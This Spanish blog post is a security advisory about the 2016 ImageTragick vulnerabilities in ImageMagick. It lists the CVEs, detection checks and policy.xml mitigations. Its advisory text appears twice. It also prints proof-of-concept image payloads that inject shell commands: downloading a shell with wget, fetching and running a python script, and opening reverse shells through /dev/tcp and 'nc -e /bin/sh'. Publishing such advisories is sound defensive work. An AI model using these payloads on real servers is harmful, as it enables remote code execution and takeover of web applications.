Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1090
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
▼
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
▼
mayo
(Total:
22
)
- Nueva campaña de Ransomware suplantando factura de...
- Condenan a prisión al hacker eslovaco que avisó de...
- Desmantelada red española de distribución ilegal d...
- Análisis del hackeo al Sindicato de los Mossos de ...
- Roban 5.000€ a un Mosso de Esquadra después de la ...
- Phineas Fisher hackeó el Sindicato de los Mossos, ...
- Phineas Fisher filtra los datos personales de unos...
- El creador de VNC Roulette descubre y vende fallo ...
- Proyecto kickstarter quiere monitorizar tus pedos ...
- Habilita automáticamente HTTPS en tu sitio web con...
- La Policía oculta las caras de unos corderos para ...
- Al director del FBI no le gusta el cifrado de What...
- Usar un contenedor Docker de Metasploit Framework ...
- Chica de 19 años transmite su suicidio en directo ...
- El grupo turco Bozkurt hackea más bancos y publica...
- Nueva (para variar) vulnerabilidad crítica en Adob...
- PornHub también se suma al programa de recompensas...
- 3.000 estudiantes de Tailandia deberán repetir exa...
- No, Craig Wright ni es Satoshi Nakamoto, ni es el ...
- Un niño de 10 años obtiene una recompensa de 10.00...
- Múltipes y graves vulnerabilidades en ImageMagick
- Cifrar documentos, ficheros o carpetas con GnuPG e...
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
396
)
privacidad
(
364
)
google
(
355
)
ransomware
(
341
)
vulnerabilidad
(
305
)
Malware
(
265
)
Windows
(
246
)
android
(
244
)
cve
(
237
)
tutorial
(
237
)
manual
(
222
)
software
(
206
)
hardware
(
196
)
linux
(
127
)
twitter
(
117
)
ddos
(
95
)
WhatsApp
(
92
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
68
)
app
(
65
)
Networking
(
57
)
nvidia
(
53
)
ssd
(
51
)
youtube
(
50
)
firmware
(
44
)
adobe
(
43
)
office
(
41
)
hack
(
40
)
firefox
(
36
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
apache
(
26
)
MAC
(
25
)
programación
(
25
)
exploit
(
23
)
multimedia
(
23
)
javascript
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
En la Operación Torpedo el FBI utilizó Metasploit Framework , un software totalmente libre construido originalmente sobre lenguaje Perl y p...
-
Recientemente, 2K Games ha sufrido un ataque dentro de su plataforma de soporte técnico. Dicha plataforma, fue hackeada y utilizada para...
Múltipes y graves vulnerabilidades en ImageMagick
miércoles, 4 de mayo de 2016
|
Publicado por
el-brujo
|
Editar entrada
El popular software "ImageMagick" utilizado en numerosas páginas web para mostrar, manipular y convertir imágenes ha sido rebautizado en Twitter como #ImageTragick por las graves vulnerabilidades encontradas en los dos últimos días. Stewie encontró el error inicial, y Nikolay Ermishkin del Equipo de Seguridad Mail.Ru encontró problemas adicionales, incluyendo el grave bug RCE (Remote Code Execution).
ImageMagick es un sistema parecido a la libería GD que lleva por defecto en lenguaje PHP para manipular imágenes en cualquier página web, aunque también es utilizado en línea de comandos ya que es ideal para el procesamiento masivo de imágenes.Por ejemplo, MediaWiki pude utilizar ImageMagick o GD indistintamente para crear miniaturas (thumbnails) de imágenes.
La vulnerabilidad también está presente en los servidores donde la biblioteca se compila con Ruby (rmagick y paperclip) y NodeJs ImageMagick.
Los atacantes están explotando el tema mediante la subida de imágenes maliciosos a aplicaciones web que utilizan la biblioteca ImageMagick para procesarlas.
Existen múltiples vulnerabilidades en ImageMagick, un paquete comúnmente utilizado por los servicios de Internet para procesar las imágenes. Una de las vulnerabilidades puede provocar la ejecución remota de código (RCE) si procesa las imágenes enviadas por los usuarios. El exploit para esta vulnerabilidad está siendo utilizado de manera pública.
Las vulnerabilidades son:
O ejecutar comandos
O obtener una shell directamente son setsid o nc:
Para saber si tu CMS como Wordpress o simplemente tu página web está afectada:
Por si todo esto fuera poco, ImageMagick también sabe cómo utilizar libxml2 cliente de FTP integrado para buscar imágenes a través de FTP, con lo que podrían aparecer nuevas vulnerabilidades desconocidas hasta ahora. Y de todas maneras los parches que están introduciendo los creadores de ImageMagick no parecen del todo seguro, así qeu mucho cudiado con vuestras aplicaciones web.
El problema además es que hay varios forks de ImageMagick, además que una serie de procesamiento de imágenes de plugins dependen de la biblioteca ImageMagick, incluyendo, imagick de PHP, RMagick y clip de Ruby, y imagemagick de nodejs. Si utiliza ImageMagick o una biblioteca afectada, se recomienda a mitigar las vulnerabilidades conocidas por hacer por lo menos una de estas dos cosas (pero preferiblemente ambas):
Fichero de configuración policy.xml
Cuidado con las extensiones MSL (Magick Scripting Language) y MVG (Magick Vector Graphics)
Fuentes:
http://www.openwall.com/lists/oss-security/2016/05/03/18
https://imagetragick.com/
https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588
ImageMagick es un sistema parecido a la libería GD que lleva por defecto en lenguaje PHP para manipular imágenes en cualquier página web, aunque también es utilizado en línea de comandos ya que es ideal para el procesamiento masivo de imágenes.Por ejemplo, MediaWiki pude utilizar ImageMagick o GD indistintamente para crear miniaturas (thumbnails) de imágenes.
La vulnerabilidad también está presente en los servidores donde la biblioteca se compila con Ruby (rmagick y paperclip) y NodeJs ImageMagick.
Los atacantes están explotando el tema mediante la subida de imágenes maliciosos a aplicaciones web que utilizan la biblioteca ImageMagick para procesarlas.
Existen múltiples vulnerabilidades en ImageMagick, un paquete comúnmente utilizado por los servicios de Internet para procesar las imágenes. Una de las vulnerabilidades puede provocar la ejecución remota de código (RCE) si procesa las imágenes enviadas por los usuarios. El exploit para esta vulnerabilidad está siendo utilizado de manera pública.
Las vulnerabilidades son:
- CVE-2016-3714 - Insufficient shell characters filtering leads to (potentially remote) code execution
- CVE-2016-3718 - SSRF - Es posible hacer peticiones GET HTTP o FTP.
- CVE-2016-3715 - Borrar ficheros
- CVE-2016-3716 - Mover ficheros
- CVE-2016-3717 - Leer ficheros locales. Reportado por el autor original del bug https://hackerone.com/stewie)
fill 'url(https://example.com/image.jpg"|ls "-la)'También es posible subir una webshell si está habilitada la opción de upload_files en WordPress o file_uploads en PHP, algo muy habitual si tenemos en cuenta que un usuario puede subir una imágen.
O ejecutar comandos
fill 'url(http://elhacker.net/imagen.jpg"|wget -o- ejemplo.com/shell > "/tmp/shell)'
fill 'url(https://example.com/imagen.jpg"|wget http://example.com/script.py -o /tmp/script.py && python /tmp/script.py ip 80")'
O obtener una shell directamente son setsid o nc:
fill 'url(https://\x22|setsid /bin/bash -i >/dev/tcp/192.168.0.1/443 0<&1 2>&1")' fill 'url(https://ejemplo.com/imagen.png"|nc -e /bin/sh 192.168.0.1
Y en definitiva cualquier comando que se te ocurra en la shell de Linux.ImageMagick PoC
Para saber si tu CMS como Wordpress o simplemente tu página web está afectada:
- Inspecciona la salida de la función phpinfo() de php y busca por la palabra “Imagick”
- Ejecuta php -m | grep imagick en la línea de comandos.
Por si todo esto fuera poco, ImageMagick también sabe cómo utilizar libxml2 cliente de FTP integrado para buscar imágenes a través de FTP, con lo que podrían aparecer nuevas vulnerabilidades desconocidas hasta ahora. Y de todas maneras los parches que están introduciendo los creadores de ImageMagick no parecen del todo seguro, así qeu mucho cudiado con vuestras aplicaciones web.
- https://news.ycombinator.com/item?id=11624109
- https://github.com/ImageMagick/ImageMagick/blob/8c9d68ca4241b6faafa7a35658a125c3500a5edf/MagickCore/magic.c#L89
Mitigar la vulnerabilidad
El problema además es que hay varios forks de ImageMagick, además que una serie de procesamiento de imágenes de plugins dependen de la biblioteca ImageMagick, incluyendo, imagick de PHP, RMagick y clip de Ruby, y imagemagick de nodejs. Si utiliza ImageMagick o una biblioteca afectada, se recomienda a mitigar las vulnerabilidades conocidas por hacer por lo menos una de estas dos cosas (pero preferiblemente ambas):
- Comprueba que todos los archivos de imágenes comienzan con los esperados "bytes mágicos" que corresponden a los tipos de archivo de imagen que admita antes de enviarlos a ImageMagick para su procesamiento. (Ver FAQ para más información)
- Utiliza un archivo de políticas (PolicyMap) para desactivar los codificadores de ImageMagick vulnerables. La política global para ImageMagick se encuentra normalmente en "/ etc / ImageMagick". El ejemplo policy.xml continuación se desactivará el codificadores EPHEMERAL, URL, MVG, and MSL.
Bytes Mágicos
Los primeros bytes de un archivo pueden servir a menudo utilizados para identificar el tipo de archivo. Algunos ejemplos son imágenes GIF, que comienzan con los bytes hexadecimales "47 49 46 38", y las imágenes JPEG, que comienzan con "FF D8". Esta lista en la Wikipedia tiene los bytes mágicos para la mayoría de los tipos de archivos comunes.PolicyMap
Nota: Falta añadir el símbolo < antes de cada líneaFichero de configuración policy.xml
Y añadir:policymap> policy domain="coder" rights="none" pattern="EPHEMERAL" /> policy domain="coder" rights="none" pattern="URL" /> policy domain="coder" rights="none" pattern="HTTPS" /> policy domain="coder" rights="none" pattern="MVG" /> policy domain="coder" rights="none" pattern="MSL" /> /policymap>
policy domain="path" rights="none" pattern="@*" />
Cuidado con las extensiones MSL (Magick Scripting Language) y MVG (Magick Vector Graphics)
Fuentes:
http://www.openwall.com/lists/oss-security/2016/05/03/18
https://imagetragick.com/
https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.